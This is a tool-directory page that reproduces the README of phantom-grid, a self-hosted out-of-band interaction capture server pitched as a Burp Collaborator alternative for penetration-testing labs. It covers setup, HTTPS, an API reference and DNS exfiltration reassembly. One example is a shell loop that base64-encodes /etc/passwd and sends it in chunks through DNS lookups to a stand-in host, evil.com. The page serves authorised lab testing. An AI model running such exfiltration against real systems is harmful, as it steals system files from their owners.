Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
phantom-grid — Free Burp Collaborator alternative- OOB interaction capture (HTTP/HTTPS/DNS) with SQLite & exfil reassembly | Kitploit
Tools/GitHubGitHub/evkir/phantom-grid
Payload GenerationVulnerability AnalysisWeb Application ExploitationData ExfiltrationInformation GatheringWeb SecurityPenetration TestingUtilities & FrameworksRed TeamingDNS Analysis
GitHub
1121 month agoNot yet reviewed
evkir/phantom-grid

phantom-grid

Free Burp Collaborator alternative- OOB interaction capture (HTTP/HTTPS/DNS) with SQLite & exfil reassembly

View RepositoryWebsite

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Phantom Grid

⬡ Phantom Grid

Free, open-source Burp Collaborator alternative for penetration testing labs
Out-of-Band (OOB) interaction capture · HTTP/HTTPS · DNS · SQLite · Exfil reassembly


What is this?

Phantom Grid is a self-hosted OOB (Out-of-Band) interaction capture tool — a free alternative to Burp Collaborator for solving penetration testing labs (PortSwigger Web Security Academy, HackTheBox, TryHackMe, etc.).

v2.0 Features

FeatureDescription
HTTP + HTTPS CaptureDual-stack with auto-generated self-signed TLS certs
DNS CaptureBuilt-in DNS server on port 53
DNS Exfil ReassemblyAutomatic chunk reassembly from multi-part DNS exfiltration
SQLite PersistenceAll data survives server restarts (WAL mode for performance)
40+ Payload TemplatesSSRF, XXE, SQLi OOB, CMDi, SSTI, DNS exfil — ready to copy
Tactical DashboardCommand center UI with real-time monitoring
Docker ReadyOne-command deployment
REST APIFull token/interaction/exfil management API

Quick Start

Option 1: Python

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt

# HTTP only
python server/server.py

# HTTP + HTTPS (auto-generates self-signed cert)
python server/server.py --https

# Full stack (requires sudo for DNS port 53)
sudo python server/server.py --https --dns

Option 2: Docker

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d

Option 3: ngrok (for labs without a VPS)

python server/server.py --https &
ngrok http 9090
# Use the ngrok HTTPS URL in your payloads

Architecture

┌──────────────────────────────────────────────────────────────┐
│                      PHANTOM GRID v2.0                        │
│                                                               │
│  ┌─────────────┐      ┌─────────────────────────────────┐   │
│  │  Dashboard   │─API─▶│  Flask Server                   │   │
│  │  (React)     │      │                                 │   │
│  └─────────────┘      │  :9090  HTTP  capture + API     │   │
│                         │  :9443  HTTPS capture + API     │   │
│  ┌─────────────┐      │  :53    DNS   capture            │   │
│  │ Target App   │─────▶│                                 │   │
│  └─────────────┘      └──────────┬──────────────────────┘   │
│                                    │                          │
│                         ┌──────────▼──────────┐              │
│                         │   SQLite Database    │              │
│                         │   phantom_grid.db    │              │
│                         │                      │              │
│                         │  tokens              │              │
│                         │  interactions         │              │
│                         │  dns_exfil_sessions  │              │
│                         │  dns_exfil_chunks    │              │
│                         └─────────────────────┘              │
│                                                               │
└──────────────────────────────────────────────────────────────┘

HTTPS Support

Modern apps often block mixed-content requests (http:// from https:// pages). Phantom Grid v2.0 runs HTTPS alongside HTTP.

Auto-generated self-signed cert

python server/server.py --https
# Generates certs/server.pem + certs/server.key automatically
# HTTPS available at https://0.0.0.0:9443

Custom certificate (Let's Encrypt, etc.)

python server/server.py --https \
  --cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
  --key /etc/letsencrypt/live/yourdomain/privkey.pem

With ngrok (instant public HTTPS)

python server/server.py &
ngrok http 9090
# ngrok provides a trusted HTTPS URL automatically

DNS Exfiltration Reassembly

Phantom Grid automatically reassembles chunked DNS exfiltration data. This is critical for extracting large payloads that must be split across multiple DNS lookups (labels limited to 63 bytes).

Supported Formats

FormatExampleUse Case
Simpledata.TOKEN.domainSingle value exfil
Indexed0.chunk1.TOKEN.domainAuto-session, ordered chunks
Taggedsess1.0.chunk1.TOKEN.domainNamed session with ordering
End signalend.sess1.TOKEN.domainMark session complete

Example: Exfiltrate /etc/passwd via DNS

On the target:

# Split file into 50-byte base64 chunks and send via DNS
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
  chunk=$(echo "$data" | cut -c1-50)
  data=$(echo "$data" | cut -c51-)
  nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
  i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1

View reassembled data:

curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil

Response:

[{
  "session_tag": "exfil",
  "completed": 1,
  "chunk_count": 12,
  "reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]

SQLite Persistence

All data is stored in phantom_grid.db using SQLite WAL mode for concurrent read/write performance.

phantom_grid.db
├── tokens                 — Token metadata
├── interactions            — All HTTP/DNS captures
├── dns_exfil_sessions     — Grouped exfil sessions
└── dns_exfil_chunks       — Individual exfil data chunks

Data survives server restarts. Back up by copying phantom_grid.db.


API Reference

Tokens

MethodEndpointDescription
GET/api/tokensList all tokens with stats
POST/api/tokensCreate token {"label": "...", "notes": "..."}
PATCH/api/tokens/<id>Update token label/notes
DELETE/api/tokens/<id>Delete token + all data (CASCADE)

Interactions

MethodEndpointDescription
GET/api/tokens/<id>/interactions?limit=&offset=Get token interactions
DELETE/api/tokens/<id>/interactionsClear interactions
GET/api/log?limit=Global log (all tokens)
GET/api/poll?since=<ISO>Poll new interactions

DNS Exfiltration

MethodEndpointDescription
GET/api/tokens/<id>/exfilGet exfil sessions with reassembled data

System

MethodEndpointDescription
GET/api/statsGlobal stats (counts, DB size)
GET/healthHealth check

Capture Endpoints

ProtocolEndpoint
HTTPhttp://server:9090/c/<TOKEN>
HTTPShttps://server:9443/c/<TOKEN>
DNS<TOKEN>.yourdomain.com
DNS exfil<data>.<TOKEN>.yourdomain.com

CLI Options

python server.py [OPTIONS]
Download Tool